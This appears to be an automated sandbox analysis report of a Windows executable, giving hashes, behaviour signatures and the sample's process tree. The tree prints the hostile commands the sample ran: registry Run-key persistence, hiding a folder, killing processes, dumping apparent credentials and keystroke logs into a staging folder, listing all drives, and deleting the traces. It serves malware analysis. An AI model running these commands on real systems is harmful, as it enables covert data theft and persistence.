Analysis

  • max time kernel
    150s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2022 09:46

General

  • Target

    688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe

  • Size

    32KB

  • MD5

    ebd4ff5dd3b586aa279899a33dbc093b

  • SHA1

    f861dc94a155c8a3d7952c79eca146ef61123c39

  • SHA256

    688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e

  • SHA512

    973561d45cc8e4b31a91f0daf4504f555b34c352fd0d26750b4e3693ee38161881908598e909beaf2c2616b394f2a9dbdf5091158ae7594c09448329ad96dcf6

  • SSDEEP

    192:/Tmxc4FkYQPY7bKTpBVhUkEV/r0rwxk1VY+gkGG2KM/qqleJnJtM3gxU4kzk/xA0:/TAnuAApBVhUfo16oCGvjc8WlD94o6

Score
6/10

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 12 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 20 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe
    "C:\Users\Admin\AppData\Local\Temp\688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im dl.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im dl.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4800
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c explorer C:\users\public\windows\dl.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Windows\SysWOW64\explorer.exe
        explorer C:\users\public\windows\dl.exe
        3⤵
          PID:4864
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1784
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f
          3⤵
          • Adds Run key to start application
          PID:4092
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib +h +r +s c:\Users\public\windows
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +r +s c:\Users\public\windows
          3⤵
          • Views/modifies file attributes
          PID:2744
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\users\public\windows\file.sys /stext C:\users\public\windows\Att\log.txt
        2⤵
          PID:4060
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1704
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f
            3⤵
            • Adds Run key to start application
            PID:3756
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c taskkill /f /im file.sys
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3556
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im file.sys
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3516
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c if exist C:\users\public\windows\windows.exe explorer C:\users\public\windows\windows.exe
          2⤵
            PID:2000
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c dir C:\ > C:\users\public\windows\Att\abban.txt
            2⤵
              PID:3336
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c dir B:\ >> C:\users\public\windows\Att\abban.txt
              2⤵
                PID:4408
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c dir A:\ >> C:\users\public\windows\Att\abban.txt
                2⤵
                  PID:1912
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c dir D:\ >> C:\users\public\windows\Att\abban.txt
                  2⤵
                    PID:3308
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c dir Q:\ >> C:\users\public\windows\Att\abban.txt
                    2⤵
                      PID:2308
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c dir G:\ >> C:\users\public\windows\Att\abban.txt
                      2⤵
                        PID:564
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c dir H:\ >> C:\users\public\windows\Att\abban.txt
                        2⤵
                          PID:4832
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c dir I:\ >> C:\users\public\windows\Att\abban.txt
                          2⤵
                            PID:4944
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c dir J:\ >> C:\users\public\windows\Att\abban.txt
                            2⤵
                              PID:3452
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c dir K:\ >> C:\users\public\windows\Att\abban.txt
                              2⤵
                                PID:4252
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c dir R:\ >> C:\users\public\windows\Att\abban.txt
                                2⤵
                                  PID:3752
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c dir M:\ >> C:\users\public\windows\Att\abban.txt
                                  2⤵
                                    PID:1640
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c dir N:\ >> C:\users\public\windows\Att\abban.txt
                                    2⤵
                                      PID:4356
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c dir L:\ >> C:\users\public\windows\Att\abban.txt
                                      2⤵
                                        PID:4296
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c dir O:\ >> C:\users\public\windows\Att\abban.txt
                                        2⤵
                                          PID:2840
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c dir E:\ >> C:\users\public\windows\Att\abban.txt
                                          2⤵
                                            PID:1160
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c dir S:\ >> C:\users\public\windows\Att\abban.txt
                                            2⤵
                                              PID:3732
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c dir F:\ >> C:\users\public\windows\Att\abban.txt
                                              2⤵
                                                PID:952
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c dir P:\ >> C:\users\public\windows\Att\abban.txt
                                                2⤵
                                                  PID:2940
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c dir U:\ >> C:\users\public\windows\Att\abban.txt
                                                  2⤵
                                                    PID:2204
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c dir V:\ >> C:\users\public\windows\Att\abban.txt
                                                    2⤵
                                                      PID:2032
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c dir W:\ >> C:\users\public\windows\Att\abban.txt
                                                      2⤵
                                                        PID:3512
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c dir X:\ >> C:\users\public\windows\Att\abban.txt
                                                        2⤵
                                                          PID:2732
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c copy /y C:\users\public\windows\key.sys C:\users\public\windows\Att\key.txt
                                                          2⤵
                                                            PID:1128
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c dir z:\ >> C:\users\public\windows\Att\abban.txt
                                                            2⤵
                                                              PID:2644
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c dir Y:\ >> C:\users\public\windows\Att\abban.txt
                                                              2⤵
                                                                PID:5056
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c dir T:\ >> C:\users\public\windows\Att\abban.txt
                                                                2⤵
                                                                  PID:4396
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c del /f /q C:\users\public\windows\Att\pic.jpg
                                                                  2⤵
                                                                    PID:1736
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c del /f /q C:\users\public\windows\Att\log.txt
                                                                    2⤵
                                                                      PID:4832
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c del /f /q C:\users\public\windows\Att\key.txt
                                                                      2⤵
                                                                        PID:1688
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c del /f /q C:\users\public\windows\Att\abban.txt
                                                                        2⤵
                                                                          PID:1512
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f
                                                                          2⤵
                                                                            PID:4816
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f
                                                                              3⤵
                                                                              • Adds Run key to start application
                                                                              PID:1140
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f
                                                                            2⤵
                                                                              PID:4688
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f
                                                                                3⤵
                                                                                • Adds Run key to start application
                                                                                PID:2824
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c C:\users\public\windows\file.sys /stext C:\users\public\windows\Att\log.txt
                                                                              2⤵
                                                                                PID:4064
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c attrib +h +r +s c:\Users\public\windows
                                                                                2⤵
                                                                                  PID:4676
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    attrib +h +r +s c:\Users\public\windows
                                                                                    3⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:4600
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c taskkill /f /im file.sys
                                                                                  2⤵
                                                                                    PID:3644
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /f /im file.sys
                                                                                      3⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1092
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c if exist C:\users\public\windows\windows.exe explorer C:\users\public\windows\windows.exe
                                                                                    2⤵
                                                                                      PID:3312
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c dir C:\ > C:\users\public\windows\Att\abban.txt
                                                                                      2⤵
                                                                                        PID:3488
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c dir B:\ >> C:\users\public\windows\Att\abban.txt
                                                                                        2⤵
                                                                                          PID:1884
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c dir D:\ >> C:\users\public\windows\Att\abban.txt
                                                                                          2⤵
                                                                                            PID:384
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c dir R:\ >> C:\users\public\windows\Att\abban.txt
                                                                                            2⤵
                                                                                              PID:2452
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c dir Q:\ >> C:\users\public\windows\Att\abban.txt
                                                                                              2⤵
                                                                                                PID:4804
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c dir G:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                2⤵
                                                                                                  PID:952
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /c dir H:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                  2⤵
                                                                                                    PID:3092
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c dir A:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                    2⤵
                                                                                                      PID:564
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c dir J:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                      2⤵
                                                                                                        PID:2732
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c dir I:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                        2⤵
                                                                                                          PID:3832
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c dir K:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                          2⤵
                                                                                                            PID:4260
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c dir N:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                            2⤵
                                                                                                              PID:884
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c copy /y C:\users\public\windows\key.sys C:\users\public\windows\Att\key.txt
                                                                                                              2⤵
                                                                                                                PID:1552
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c dir z:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                2⤵
                                                                                                                  PID:2288
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c dir Y:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                  2⤵
                                                                                                                    PID:440
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c dir X:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                    2⤵
                                                                                                                      PID:1128
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c dir W:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                      2⤵
                                                                                                                        PID:940
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c dir V:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                        2⤵
                                                                                                                          PID:3448
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c dir U:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                          2⤵
                                                                                                                            PID:1560
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c dir T:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                            2⤵
                                                                                                                              PID:1420
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /c dir S:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                              2⤵
                                                                                                                                PID:1684
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /c dir E:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                2⤵
                                                                                                                                  PID:4288
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd /c dir F:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                  2⤵
                                                                                                                                    PID:4796
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /c dir P:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                    2⤵
                                                                                                                                      PID:1088
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd /c dir O:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                      2⤵
                                                                                                                                        PID:1332
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /c dir M:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                        2⤵
                                                                                                                                          PID:3740
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /c dir L:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                          2⤵
                                                                                                                                            PID:2600
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /c del /f /q C:\users\public\windows\Att\pic.jpg
                                                                                                                                            2⤵
                                                                                                                                              PID:4312
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /c del /f /q C:\users\public\windows\Att\log.txt
                                                                                                                                              2⤵
                                                                                                                                                PID:1380
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /c del /f /q C:\users\public\windows\Att\key.txt
                                                                                                                                                2⤵
                                                                                                                                                  PID:1864
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c del /f /q C:\users\public\windows\Att\abban.txt
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2716
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1140
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f
                                                                                                                                                        3⤵
                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                        PID:4292
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c taskkill /f /im file.sys
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2336
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /f /im file.sys
                                                                                                                                                          3⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:4832
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /c C:\users\public\windows\file.sys /stext C:\users\public\windows\Att\log.txt
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4748
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c attrib +h +r +s c:\Users\public\windows
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1324
                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                              attrib +h +r +s c:\Users\public\windows
                                                                                                                                                              3⤵
                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                              PID:1520
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2880
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f
                                                                                                                                                                3⤵
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                PID:4972
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd /c dir C:\ > C:\users\public\windows\Att\abban.txt
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4524
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /c dir B:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:560
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd /c dir A:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5000
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd /c if exist C:\users\public\windows\windows.exe explorer C:\users\public\windows\windows.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2116
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      cmd /c copy /y C:\users\public\windows\key.sys C:\users\public\windows\Att\key.txt
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1180
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd /c dir z:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3732
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd /c dir Y:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1504
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd /c dir X:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:460
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              cmd /c dir W:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3984
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd /c dir V:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3268
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd /c dir U:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2200
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    cmd /c dir T:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4888
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd /c dir S:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1616
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd /c dir E:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2896
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /c dir F:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4500
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            cmd /c dir P:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3736
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd /c dir O:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4620
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                cmd /c dir N:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5016
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  cmd /c dir M:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2440
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    cmd /c dir L:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3512
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd /c dir K:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:548
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd /c dir J:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:3900
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          cmd /c dir I:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2648
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd /c dir H:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:5112
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd /c dir G:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:116
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                cmd /c dir Q:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  cmd /c dir R:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2312
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    cmd /c dir D:\ >> C:\users\public\windows\Att\abban.txt
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1096
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /c del /f /q C:\users\public\windows\Att\pic.jpg
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4776
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd /c del /f /q C:\users\public\windows\Att\log.txt
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:3988
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          cmd /c del /f /q C:\users\public\windows\Att\key.txt
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3860
                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                          C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:4220

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • memory/384-189-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/564-154-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/564-187-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/952-192-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/952-164-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1128-174-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1140-195-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1160-165-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1420-136-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1512-178-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1576-139-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1640-160-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1688-177-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1704-137-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1736-175-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1784-138-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1884-186-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/1912-150-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/2000-146-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/2032-169-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/2204-168-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/2308-153-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/2452-190-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/2644-173-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/2732-196-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                        • memory/2732-171-0x0000000000000000-mapping.dmp

